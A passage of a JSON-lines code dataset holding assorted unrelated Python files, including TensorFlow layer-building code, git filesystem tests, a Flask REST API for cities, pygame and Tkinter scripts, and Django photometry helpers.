scope.\n units : int\n Number of units in the dense layer.\n strides : int\n Default is 1.\n padding : str\n Padding mode, can be 'same' or 'valid'. Default - 'same'.\n data_format : str\n 'channels_last' or 'channels_first'. Default - 'channels_last'.\n dilation_rate: int\n Default is 1.\n activation : callable\n Default is `tf.nn.relu`.\n pool_size : int\n Default is 2.\n pool_strides : int\n Default is 2.\n pool_op : str\n Pooling operation ('max', 'mean', 'frac')\n dropout_rate : float\n Default is 0.\n factor : int or tuple of int\n Upsampling factor\n upsampling_layout : str\n Layout for upsampling layers\n is_training : bool or tf.Tensor\n Default is True.\n reuse : bool\n Whether to user layer variables if exist\n\n dense : dict\n Parameters for dense layers, like initializers, regularalizers, etc.\n conv : dict\n Parameters for convolution layers, like initializers, regularalizers, etc.\n transposed_conv : dict\n Parameters for transposed conv layers, like initializers, regularalizers, etc.\n batch_norm : dict or None\n Parameters for batch normalization layers, like momentum, intiializers, etc\n If None or inculdes parameters 'off' or 'disable' set to True or 1,\n the layer will be excluded whatsoever.\n pooling : dict\n Parameters for pooling layers, like initializers, regularalizers, etc.\n dropout : dict or None\n Parameters for dropout layers, like noise_shape, etc\n If None or inculdes parameters 'off' or 'disable' set to True or 1,\n the layer will be excluded whatsoever.\n dropblock : dict or None\n Parameters for dropblock layers, like dropout_rate, block_size, etc.\n subpixel_conv : dict or None\n Parameters for subpixel convolution like layout, activation, etc.\n resize_bilinear : dict or None\n Parameters for bilinear resize.\n resize_bilinear_additive : dict or None\n Parameters for bilinear additive resize like layout, activation, etc.\n\n Notes\n -----\n When ``layout`` includes several layers of the same type, each one can have its own parameters,\n if corresponding args are passed as lists (not tuples).\n\n Spaces may be used to improve readability.\n\n\n Examples\n --------\n A simple block: 3x3 conv, batch norm, relu, 2x2 max-pooling with stride 2::\n\n x = ConvBlock('cnap', filters=32, kernel_size=3)(x)\n\n A canonical bottleneck block (1x1, 3x3, 1x1 conv with relu in-between)::\n\n x = ConvBlock('nac nac nac', [64, 64, 256], [1, 3, 1])(x)\n\n A complex Nd block:\n\n - 5x5 conv with 32 filters\n - relu\n - 3x3 conv with 32 filters\n - relu\n - 3x3 conv with 64 filters and a spatial stride 2\n - relu\n - batch norm\n - dropout with rate 0.15\n\n ::\n\n x = ConvBlock('ca ca ca nd', [32, 32, 64], [5, 3, 3], strides=[1, 1, 2], dropout_rate=.15)(x)\n\n A residual block::\n\n x = ConvBlock('R nac nac +', [16, 16, 64], [1, 3, 1])(x)\n\n \"\"\"\n LETTERS_LAYERS = {\n 'a': 'activation',\n 'R': 'residual_start',\n '+': 'residual_end',\n '.': 'residual_end',\n '*': 'residual_end',\n 'f': 'dense',\n 'c': 'conv',\n 't': 'transposed_conv',\n 'C': 'separable_conv',\n 'T': 'separable_conv_transpose',\n 'w': 'depthwise_conv',\n 'W': 'depthwise_conv_transpose',\n 'p': 'pooling',\n 'v': 'pooling',\n 'P': 'global_pooling',\n 'V': 'global_pooling',\n 'n': 'batch_norm',\n 'd': 'dropout',\n 'D': 'alpha_dropout',\n 'O': 'dropblock',\n 'm': 'mip',\n 'A': 'residual_bilinear_additive',\n 'b': 'resize_bilinear',\n 'B': 'resize_bilinear_additive',\n 'N': 'resize_nn',\n 'X': 'subpixel_conv'\n }\n\n LAYERS_CLASSES = {\n 'activation': None,\n 'residual_start': None,\n 'residual_end': None,\n 'dense': Dense,\n 'conv': Conv,\n 'transposed_conv': ConvTranspose,\n 'separable_conv': SeparableConv,\n 'separable_conv_transpose': SeparableConvTranspose,\n 'depthwise_conv': DepthwiseConv,\n 'depthwise_conv_transpose': DepthwiseConvTranspose,\n 'pooling': Pooling,\n 'global_pooling': GlobalPooling,\n 'batch_norm': BatchNormalization,\n 'dropout': Dropout,\n 'alpha_dropout': AlphaDropout,\n 'dropblock': Dropblock,\n 'mip': Mip,\n 'residual_bilinear_additive': None,\n 'resize_bilinear': ResizeBilinear,\n 'resize_bilinear_additive': ResizeBilinearAdditive,\n 'resize_nn': ResizeNn,\n 'subpixel_conv': SubpixelConv\n }\n\n DEFAULT_LETTERS = LETTERS_LAYERS.keys()\n LETTERS_GROUPS = dict(zip(DEFAULT_LETTERS, DEFAULT_LETTERS))\n LETTERS_GROUPS.update({\n 'C': 'c',\n 't': 'c',\n 'T': 'c',\n 'w': 'c',\n 'W': 'c',\n 'v': 'p',\n 'V': 'P',\n 'D': 'd',\n 'O': 'd',\n 'n': 'd',\n 'A': 'b',\n 'B': 'b',\n 'N': 'b',\n 'X': 'b',\n })\n\n def __init__(self, layout='',\n filters=0, kernel_size=3, strides=1, dilation_rate=1, depth_multiplier=1,\n activation=tf.nn.relu,\n pool_size=2, pool_strides=2,\n dropout_rate=0.,\n padding='same', data_format='channels_last', name=None,\n **kwargs):\n self.layout = layout\n self.filters, self.kernel_size, self.strides = filters, kernel_size, strides\n self.dilation_rate, self.depth_multiplier = dilation_rate, depth_multiplier\n self.activation = activation\n self.pool_size, self.pool_strides = pool_size, pool_strides\n self.dropout_rate = dropout_rate\n self.padding, self.data_format = padding, data_format\n self.name = name\n self.kwargs = kwargs\n\n\n def add_letter(self, letter, cls, name=None):\n \"\"\" Add custom letter to layout parsing procedure.\n\n Parameters\n ----------\n letter : str\n Letter to add.\n cls : class\n Tensor-processing layer. Must have layer-like signature (both init and call overloaded).\n name : str\n Name of parameter dictionary. Defaults to `letter`.\n\n Examples\n --------\n Add custom `Q` letter::\n\n block = ConvBlock('cnap Q', filters=32, custom_params={'key': 'value'})\n block.add_letter('Q', my_layer_class, 'custom_params')\n x = block(x)\n \"\"\"\n name = name or letter\n self.LETTERS_LAYERS.update({letter: name})\n self.LAYERS_CLASSES.update({name: cls})\n self.LETTERS_GROUPS.update({letter: letter})\n\n\n def __call__(self, inputs, training=None):\n layout = self.layout or ''\n layout = layout.replace(' ', '')\n if len(layout) == 0:\n logger.warning('ConvBlock: layout is empty, so there is nothing to do, just returning inputs.')\n return inputs\n\n # Getting `training` indicator from kwargs by its aliases\n if training is None:\n training = self.kwargs.get('is_training')\n if training is None:\n training = self.kwargs.get('training')\n\n context = None\n if self.name is not None:\n context = tf.variable_scope(self.name, reuse=self.kwargs.get('reuse'))\n context.__enter__()\n\n layout_dict = {}\n for letter in layout:\n letter_group = self.LETTERS_GROUPS[letter]\n letter_counts = layout_dict.setdefault(letter_group, [-1, 0])\n letter_counts[1] += 1\n\n tensor = inputs\n residuals = []\n for i, letter in enumerate(layout):\n # Arguments for layer creating; arguments for layer call\n args, call_args = {}, {}\n\n letter_group = self.LETTERS_GROUPS[letter]\n layer_name = self.LETTERS_LAYERS[letter]\n layer_class = self.LAYERS_CLASSES[layer_name]\n layout_dict[letter_group][0] += 1\n\n if letter == 'a':\n args = dict(activation=self.activation)\n activation_fn = unpack_args(args, *layout_dict[letter_group])['activation']\n if activation_fn is not None:\n tensor = activation_fn(tensor)\n elif letter == 'R':\n residuals += [tensor]\n elif letter == 'A':\n args = dict(factor=self.kwargs.get('factor'), data_format=self.data_format)\n args = unpack_args(args, *layout_dict[letter_group])\n t = self.LAYERS_CLASSES['resize_bilinear_additive'](**args, name='rba-%d' % i)(tensor)\n residuals += [t]\n elif letter == '+':\n tensor = tensor + residuals[-1]\n residuals = residuals[:-1]\n elif letter == '*':\n tensor = tensor * residuals[-1]\n residuals = residuals[:-1]\n elif letter == '.':\n axis = -1 if self.data_format == 'channels_last' else 1\n tensor = tf.concat([tensor, residuals[-1]], axis=axis, name='concat-%d' % i)\n residuals = residuals[:-1]\n else:\n layer_args = self.kwargs.get(layer_name, {})\n skip_layer = layer_args is False or \\\n isinstance(layer_args, dict) and layer_args.get('disable', False)\n\n # Create params for the layer call\n if skip_layer:\n pass\n elif letter in self.DEFAULT_LETTERS:\n args = {param: getattr(self, param, self.kwargs.get(param, None))\n for param in layer_class.params\n if (hasattr(self, param) or param in self.kwargs)}\n else:\n if letter not in self.LETTERS_LAYERS.keys():\n raise ValueError('Unknown letter symbol - %s' % letter)\n\n # Additional params for some layers\n if letter_group == 'd':\n # Layers that behave differently during train/test\n call_args.update({'training': training})\n elif letter_group.lower() == 'p':\n # Choosing pooling operation\n pool_op = 'mean' if letter.lower() == 'v' else self.kwargs.pop('pool_op', 'max')\n args['op'] = pool_op\n elif letter_group == 'b':\n # Additional layouts for all the upsampling layers\n if self.kwargs.get('upsampling_layout'):\n args['layout'] = self.kwargs.get('upsampling_layout')\n\n if not skip_layer:\n args = {**args, **layer_args}\n args = unpack_args(args, *layout_dict[letter_group])\n\n with tf.variable_scope('layer-%d' % i):\n tensor = layer_class(**args)(tensor, **call_args)\n\n # Allows to easily get output from graph by name\n tensor = tf.identity(tensor, name='_output')\n\n if context is not None:\n context.__exit__(None, None, None)\n\n return tensor\n\n\ndef update_layers(letter, func, name=None):\n \"\"\" Add custom letter to layout parsing procedure.\n\n Parameters\n ----------\n letter : str\n Letter to add.\n func : class\n Tensor-processing layer. Must have layer-like signature (both init and call overloaded).\n name : str\n Name of parameter dictionary. Defaults to `letter`.\n\n Examples\n --------\n Add custom `Q` letter::\n\n block = ConvBlock('cnap Q', filters=32, custom_params={'key': 'value'})\n block.add_letter('Q', my_func, 'custom_params')\n x = block(x)\n \"\"\"\n name = name or letter\n ConvBlock.LETTERS_LAYERS.update({letter: name})\n ConvBlock.LAYERS_CLASSES.update({name: func})\n ConvBlock.LETTERS_GROUPS.update({letter: letter})\n\n\n\n@add_as_function\nclass Upsample:\n \"\"\" Upsample inputs with a given factor.\n\n Parameters\n ----------\n factor : int\n An upsamping scale\n shape : tuple of int\n Shape to upsample to (used by bilinear and NN resize)\n layout : str\n Resizing technique, a sequence of:\n\n - A - use residual connection with bilinear additive upsampling\n - b - bilinear resize\n - B - bilinear additive upsampling\n - N - nearest neighbor resize\n - t - transposed convolution\n - T - separable transposed convolution\n - X - subpixel convolution\n\n all other :class:`.ConvBlock` layers are also allowed.\n\n Examples\n --------\n A simple bilinear upsampling::\n\n x = upsample(shape=(256, 256), layout='b')(x)\n\n Upsampling with non-linear normalized transposed convolution::\n\n x = Upsample(factor=2, layout='nat', kernel_size=3)(x)\n\n Subpixel convolution with a residual bilinear additive connection::\n\n x = Upsample(factor=2, layout='AX+')(x)\n \"\"\"\n def __init__(self, factor=None, shape=None, layout='b', name='upsample', **kwargs):\n self.factor, self.shape, self.layout = factor, shape, layout\n self.name, self.kwargs = name, kwargs\n\n def __call__(self, inputs, *args, **kwargs):\n if np.all(self.factor == 1):\n return inputs\n\n if 't' in self.layout or 'T' in self.layout:\n if 'kernel_size' not in self.kwargs:\n self.kwargs['kernel_size'] = self.factor\n if 'strides' not in kwargs:\n self.kwargs['strides'] = self.factor\n\n return ConvBlock(self.layout, factor=self.factor, shape=self.shape,\n name=self.name, **self.kwargs)(inputs, *args, **kwargs)\n","sub_path":"batchflow/batchflow/models/tf/layers/conv_block.py","file_name":"conv_block.py","file_ext":"py","file_size_in_byte":15960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564349900","text":"import os.path\nimport subprocess\n\nfrom gitviewfs_objects import TreeDirItem\nfrom tests.structs.shallow import paths\nfrom tests.structs.shallow.utils import BaseDefaultDirStructTest,\\\n\tBaseDefaultDirStructIntegrationTest\n\n\nclass TreeDirItemPathTest(BaseDefaultDirStructTest):\n\t\n\tdef test_path(self):\n\t\tself.assertPathIs(paths.TREE_DIR_ITEM, TreeDirItem)\n\t\n\t\nclass TreeDirItemIntegrationTest(BaseDefaultDirStructIntegrationTest):\n\t\n\tdef test_tree_dir_items_are_symbolic_links(self):\n\t\tfilename, subdirname = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}'])\n\t\ttree_sha1 = tree_sha1.strip()\n\t\t\n\t\tfile_path = self.make_tree_dir_item_path(tree_sha1, filename)\n\t\tsubdir_path = self.make_tree_dir_item_path(tree_sha1, subdirname)\n\t\t\n\t\tself.assertTrue(os.path.islink(file_path))\n\t\tself.assertTrue(os.path.islink(subdir_path))\n\t\n\tdef test_readlink_file(self):\n\t\tfilename, _ = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}']).strip()\n\t\tfile_sha1 = subprocess.check_output(['git', 'hash-object', filename]).strip()\n\t\t\n\t\titem_path = self.make_tree_dir_item_path(tree_sha1, filename)\n\t\t\n\t\tself.assertSymLink(self.make_blob_file_path(file_sha1), item_path)\n\t\n\tdef test_readlink_dir(self):\n\t\t_, subdirname = self.create_and_commit_file_and_subdir()\n\t\ttree_sha1 = subprocess.check_output(['git', 'rev-parse', 'HEAD^{tree}']).strip()\n\t\ttree_subdir_item = subprocess.check_output('git cat-file -p ' + tree_sha1 + ' | grep ' + subdirname, shell=True).strip()\n\t\ttab_pos = tree_subdir_item.index('\\t')\n\t\tsubdir_sha1 = tree_subdir_item[: tab_pos].split(' ')[2]\n\t\t\n\t\titem_path = self.make_tree_dir_item_path(tree_sha1, subdirname)\n\t\t\n\t\tself.assertSymLink(self.make_tree_dir_path(subdir_sha1), item_path)\n","sub_path":"tests/structs/shallow/test_tree_dir_item.py","file_name":"test_tree_dir_item.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"88855992","text":"# --OPTION--\n\n# on definit les constantes\nWIDTH = 1504\nHEIGHT = 896\nFPS = 60\nTITLE = \"plateforme\"\nFONT_NAME = '04B_30__'\nRANGER_SPRITESHEET = \"Ranger-M.png\"\nENVRNMT_SPRITESHEET = \"sheet.png\"\nDAGGER_SPRITESHEET = \"gear_daggers.png\"\n\n# Physique du joueur\nPLAYER_ACC = 0.8\nPLAYER_FRICTION = -0.09\nPLAYER_GRAV = 0.8\nPLAYER_JUMP = 25\n\n# Couleurs\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nLIGHTBLUE = (0, 155, 155)\nBGCOLOR = LIGHTBLUE\nDAGGER_BG = (184, 2, 227)\n\n# arme\nRANGE_CAILLOU = 250\nVIT_CAILLOU = 10\nDAGGER1_RANGE = 350\nDAGGER1_VIT = 20\n\n# ennemi\nSERPENT_VIT = 0.5\nLIM_X_SERPENT = 200\nFRICTION_SERPENT = -0.09\n","sub_path":"constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534454490","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.widgets import TextBox\n\nfig = plt.figure()\nfig.set_dpi(100)\nfig.set_size_inches(6, 6)\n\nRb = 9\nrm = 1\n\nax = plt.axes(xlim=(-Rb-1, Rb+1), ylim=(-Rb-1, Rb+1))\npatch = plt.Circle((0, 0), rm, fill=False, fc='y')\nmain_circle = plt.Circle((0, 0), Rb, fill=False, fc='y')\nax.add_patch(main_circle)\n\n\ndef init():\n patch.center = (0, 0)\n ax.add_patch(patch)\n return patch,\n\ndef animate(i):\n x, y = patch.center\n x = (Rb-rm) * np.sin(np.radians(i))\n y = (Rb-rm) * np.cos(np.radians(i))\n patch.center = (x, y)\n return patch,\n\ndef animate2(i, Rb, rm):\n x, y = patch.center\n x = (Rb-rm) * np.sin(np.radians(i))\n y = (Rb-rm) * np.cos(np.radians(i))\n patch.center = (x, y)\n return patch,\n\nanim = animation.FuncAnimation(fig, animate2,\n fargs=(Rb, rm),\n init_func=init,\n frames=360,\n interval=1,\n blit=False)\n\ndef submit(text):\n Rb = int(text.split(',')[0])\n rm = int(text.split(',')[1])\n print(Rb, rm)\n # ax = plt.axes(xlim=(-Rb-1, Rb+1), ylim=(-Rb-1, Rb+1))\n ax.set_xlim(-Rb-1, Rb+1)\n ax.set_ylim(-Rb-1, Rb+1)\n main_circle.set_radius(Rb)\n patch.set_radius(rm)\n\n plt.draw()\n\n anim.__init__(fig, animate2, fargs=(Rb, rm),\n init_func=init,\n frames=360,\n interval=1,\n blit=False)\n anim.frame_seq = anim.new_frame_seq()\n anim.event_source.start()\n\naxbox = plt.axes([0.11, 0.90, 0.08, 0.08])\ntext_box = TextBox(axbox, 'R, r = ')\ntext_box.on_submit(submit)\n\nplt.show()","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147301814","text":"\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\n\ndef Label_encode(data):\n \"\"\"\n This function is used to label encode comment and author names (inplace). This is used now but can be\n substituted by the function in Features directory which maps to numeric values.\n\n :param data: Training data (type - pandas.DataFrame)\n :return: None\n \"\"\"\n\n lb_make = LabelEncoder()\n data[\"comment\"] = lb_make.fit_transform(data[\"comment\"])\n data[\"author\"] = lb_make.fit_transform(data[\"author\"])\n\n data.reset_index(drop=True, inplace=True)\n\n return\n\n\ndef remove_non_numeric_data(data):\n \"\"\"\n This function is used to remove non-numeric data (inplace) which might be present (quite rare) in\n the column intended for numeric data.\n\n :param data: The training data (type - pandas.DataFrame)\n :return: None\n \"\"\"\n del_ind = []\n for row_num in range(data.shape[0]):\n ele = data[\"changed files\"].iloc[row_num]\n if ele == \" \":\n data[\"changed files\"].iloc[row_num] = 0\n elif not str(ele).isdigit():\n del_ind.append(row_num)\n print(\"Number of non numeric instances removed\", len(del_ind))\n data.drop(del_ind, inplace=True)\n data['changed files'] = pd.to_numeric(data['changed files'])\n return\n\n\ndef removing_outliers(data):\n \"\"\"\n This function is used to remove any outliers in the data. They generally emerge from the commit by bots\n which tend to have a very large number of lines added due to formatting.\n\n :param data: the DataFrame containing the attributes an dthe target variable\n :return: None\n \"\"\"\n\n print(data.info())\n z = np.abs(stats.zscore(data))\n threshold = 3\n\n indexes, rows = np.where(z > threshold)\n indexes = list(set(indexes))\n\n # print(len(indexes))\n z, o = 0, 0\n\n for i in indexes:\n if data[\"buggy\"].iloc[i] == 0:\n z += 1\n else:\n o += 1\n orig_rows = data.shape[0]\n\n for ind in indexes:\n data.drop(ind, inplace=True)\n\n print(\"Number of instances removed : \", orig_rows - data.shape[0])\n\n return","sub_path":"Training/Pre_processing.py","file_name":"Pre_processing.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"13299418","text":"from tkinter import *\r\n\r\nwindow=Tk()\r\ndef converter():\r\n grams=float(e1_value.get())*1000\r\n pounds=float(e1_value.get())*2.20462\r\n ounces=float(e1_value.get())*35.274\r\n t1.delete(\"1.0\", END)\r\n t1.insert(END, grams)\r\n t2.delete(\"1.0\", END)\r\n t2.insert(END, pounds)\r\n t3.delete(\"1.0\", END)\r\n t3.insert(END, ounces)\r\n\r\nb1=Button(window, text=\"Convert\", command=converter)\r\nb1.grid(row=0, column=2)\r\n\r\ne0=Label(window, text=\"Kilogram\")\r\ne0.grid(row=0, column=1)\r\n\r\ne2=Label(window, text=\"Grams\")\r\ne2.grid(row=1, column=0)\r\n\r\ne3=Label(window, text=\"Pounds\")\r\ne3.grid(row=1, column=1)\r\n\r\ne4=Label(window, text=\"Ounces\")\r\ne4.grid(row=1, column=2)\r\n\r\ne1_value=StringVar()\r\ne1=Entry(window, textvariable=e1_value)\r\ne1.grid(row=0, column=1, columnspan=2)\r\n\r\nt1=Text(window, height=1, width=25)\r\nt1.grid(row=2, column=0)\r\n\r\nt2=Text(window, height=1, width=25)\r\nt2.grid(row=2, column=1)\r\n\r\nt3=Text(window, height=1, width=25)\r\nt3.grid(row=2, column=2)\r\n\r\nwindow.mainloop()","sub_path":"MP.TkinterConverter/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293150709","text":"# Keras Implementation\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD, Adam\n\ndef MLNN(X_train, y_train):\n model = Sequential()\n # Dense(64) is a fully-connected layer with 64 hidden units.\n # in the first layer, you must specify the expected input data shape:\n # here, 20-dimensional vectors.\n model.add(Dense(64, activation='relu', input_dim=500))\n model.add(Dropout(0.5))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n\n model.add(Dense(4, activation='softmax'))\n\n adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n\n model.compile(loss='categorical_crossentropy',\n optimizer=adam,\n metrics=['accuracy'])\n\n model.fit(X_train, y_train, epochs=150, batch_size=128)\n\n return model\n\n\n# Logistic Regression Implementation\nfrom sklearn.linear_model import LogisticRegression\ndef LR(X_train, y_train):\n model = LogisticRegression()\n model.fit(X_train, y_train)\n\n return model\n","sub_path":"src/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249859620","text":"import pygame\nfrom Player import Player\n\npygame.init()\npygame.font.init()\n\npygame.display.set_caption('Rainfun Platformer')\n#pygame.display.set_icon(pygame.image.load(r'Resources\\Enemies\\ship\\idle.png'))\n\nclock = pygame.time.Clock()\nmyfont = pygame.font.SysFont('freesans', 30)\nrunning = True\nsW = 1024\nsH = 768\nscreen = pygame.display.set_mode((sW, sH))\n\nBLACK = (0, 0, 0)\nbackground = pygame.Surface(screen.get_size())\nplayer = Player(50, 50, 'Resources/Player.png', sW, sH)\n\n\n\ndef start():\n loop()\n cleanUp()\n\ndef loop():\n global running\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n player.update()\n render()\n clock.tick(30)\n\ndef render():\n screen.fill(BLACK)\n player.render(screen)\n pygame.display.flip()\n\n\n\ndef cleanUp():\n pygame.quit()\n\n\nstart()\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519467509","text":"#!/usr/bin/python3\n\"\"\"\nModule for methods used by app_view blueprint\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, make_response, request, abort\nfrom models import storage\nfrom models.city import City\nfrom models.state import State\nfrom flasgger import swag_from\n\n\n@app_views.route('/states//cities', methods=['GET'],\n strict_slashes=False)\n@swag_from('swagger_spec/get_cities.yml')\ndef get_cities_by_state(state_id):\n \"\"\"Retrieves the list of all City objects from a given State\"\"\"\n state_list = list(storage.all(State).values())\n state = [state for state in state_list if state.id == state_id]\n if len(state) == 0:\n abort(404)\n cities = state[0].cities\n cities = [city.to_dict() for city in cities]\n return jsonify(cities)\n\n\n@app_views.route('/cities/', methods=['GET'], strict_slashes=False)\n@swag_from('swagger_spec/get_city.yml')\ndef get_city(city_id):\n \"\"\"Retrieves a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n return jsonify(city_obj.to_dict())\n\n\n@app_views.route('states//cities', methods=['POST'],\n strict_slashes=False)\n@swag_from('swagger_spec/create_city.yml')\ndef create_city(state_id):\n \"\"\"Creates a new State object\"\"\"\n data = request.get_json()\n if type(data) is not dict:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'name' not in data:\n return make_response(jsonify({'error': 'Missing name'}), 400)\n state_obj = storage.get(State, state_id)\n if state_obj is None:\n abort(404)\n new_obj = City()\n for key, value in data.items():\n if key != 'id' and key != 'created_at' and key != 'updated_at':\n setattr(new_obj, key, value)\n setattr(new_obj, 'state_id', state_id)\n new_obj.save()\n return make_response(jsonify(new_obj.to_dict()), 201)\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\n@swag_from('swagger_spec/delete_city.yml')\ndef delete_city(city_id):\n \"\"\"Deletes a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n city_obj.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/cities/', methods=['PUT'], strict_slashes=False)\n@swag_from('swagger_spec/update_city.yml')\ndef update_city(city_id):\n \"\"\"Updates a City object\"\"\"\n city_obj = storage.get(City, city_id)\n if city_obj is None:\n abort(404)\n data = request.get_json()\n if type(data) is not dict:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for key, value in data.items():\n if key != 'id' and key != 'created_at' and key != 'updated_at':\n setattr(city_obj, key, value)\n city_obj.save()\n return jsonify(city_obj.to_dict())\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362814433","text":"from pdf2image import convert_from_path\nimport os\nimport sys\n\n\ndef pdf2image(_in, _out_folder):\n if os.path.exists(_out_folder) is False:\n os.makedirs(_out_folder)\n convert_from_path(_in, output_folder=_out_folder, fmt='jpg',\n first_page=1, last_page=100)\n\n\ndef read_file():\n temp_dict = {}\n with open('files.txt', 'r', encoding='utf8') as f:\n for line in f.readline():\n key, name = line.split(',')\n temp_dict[key] = name\n return temp_dict\n\n\nif __name__ == '__main__':\n _in, _out = sys.argv[1:]\n temp_dict = read_file()\n for file in os.listdir(_in):\n name = temp_dict.get(file)\n path = os.path.join(_in, name)\n pdf2image(path, _out)\n print(path)\n","sub_path":"image_to_pdf/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30482622","text":"import logging\n\nfrom Problem_1.src.helper_classes.Exceptions import NotAStringException, FileNotFoundException\nfrom Problem_1.src.validator_classes.FilePathValidator import FilePathValidator\nfrom Problem_1.src.validator_classes.StringValidator import StringValidator\n\n\nclass InputFile:\n # konstruktor\n def __init__(self, file_path = None):\n self._loaded_file = None\n self._init_logging_module()\n\n if file_path != None:\n self.load_file(file_path)\n\n\n # ładuje plik z podanej sciezki\n def load_file(self, file_path):\n if self._is_file_path(file_path):\n self._loaded_file = open(file_path, 'r')\n else:\n logging.info(\"File couldn't be loaded\")\n\n # szuka stringa w pliku i zwraca liczbe jego wystapien\n def search_string(self, string_to_search):\n if not self._is_string(string_to_search) or not self._is_file_loaded():\n return None\n\n string_count = 0\n text_line = self._loaded_file.readline()\n\n while text_line != '':\n string_count += text_line.count(string_to_search)\n text_line = self._loaded_file.readline()\n\n return string_count\n\n # inicjuj moduł loggujący\n def _init_logging_module(self):\n logging.basicConfig(filename=\"InputFile_class_log.log\",\n filemode='a',\n format='%(asctime)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n\n # sprawdza czy zostal zaladowany plik\n def _is_file_loaded(self):\n if self._loaded_file != None:\n return True\n else:\n logging.info(\"File not loaded\")\n return False\n\n # sprawdza czy podana zmienna jest stringiem\n def _is_string(self, variable_to_check):\n validator = StringValidator()\n\n try:\n validator.validate(variable_to_check)\n except NotAStringException:\n logging.info(\"Value Passed is not a string\")\n return False\n\n return True\n\n # sprawdza czy mozna otworzyc plk\n def _is_file_path(self, file_path):\n validator = FilePathValidator()\n\n try:\n validator.validate(file_path)\n except NotAStringException:\n logging.info(\"Value passed is not a string\")\n return False\n except FileNotFoundException:\n logging.info(\"File not found under specified path\")\n return False\n\n return True\n","sub_path":"Lab_1/Problem_1/src/file_classes/InputFile.py","file_name":"InputFile.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390391768","text":"# utils for generating webpage views\nimport django\nfrom django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nimport copy\nfrom .models import *\nfrom astropy.coordinates import EarthLocation\nfrom astropy.coordinates import get_moon, SkyCoord\nfrom astropy.time import Time\nimport astropy.units as u\nimport datetime\nimport json\nimport numpy as np\nfrom django.conf import settings as djangoSettings\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\n\ndef get_recent_phot_for_host(host_id=None):\n\n\thost = Host.objects.filter(id=host_id)\n\tphotometry = HostPhotometry.objects.filter(host=host_id)\n\n\tphotdata = False\n\tfor p in photometry:\n\t\tphotdata = HostPhotData.objects.filter(photometry=p.id).order_by('-obs_date')\n\n\t\n\tif photdata:\t\n\t\treturn(photdata[0])\n\telse:\n\t\treturn(None)\n\ndef get_all_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tpidlist = []\n\tfor p in photometry:\n\t\tpidlist += [p.id]\n\tphotdata = TransientPhotData.objects.filter(photometry__in=pidlist)\n\n\tif photdata:\t\n\t\treturn(photdata)\n\telse:\n\t\treturn(None)\n\n\t\ndef get_recent_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfor p in photometry:\n\t\tphotdata = TransientPhotData.objects.filter(photometry=p.id).order_by('-obs_date')\n\n\t\n\tif photdata:\t\n\t\treturn(photdata[0])\n\telse:\n\t\treturn(None)\n\ndef get_disc_phot_for_transient(transient_id=None):\n\n\ttransient = Transient.objects.filter(id=transient_id)\n\tphotometry = TransientPhotometry.objects.filter(transient=transient_id)\n\n\tphotdata = False\n\tfirstphot = None\n\tfor p in photometry:\n\t\tphotdata = 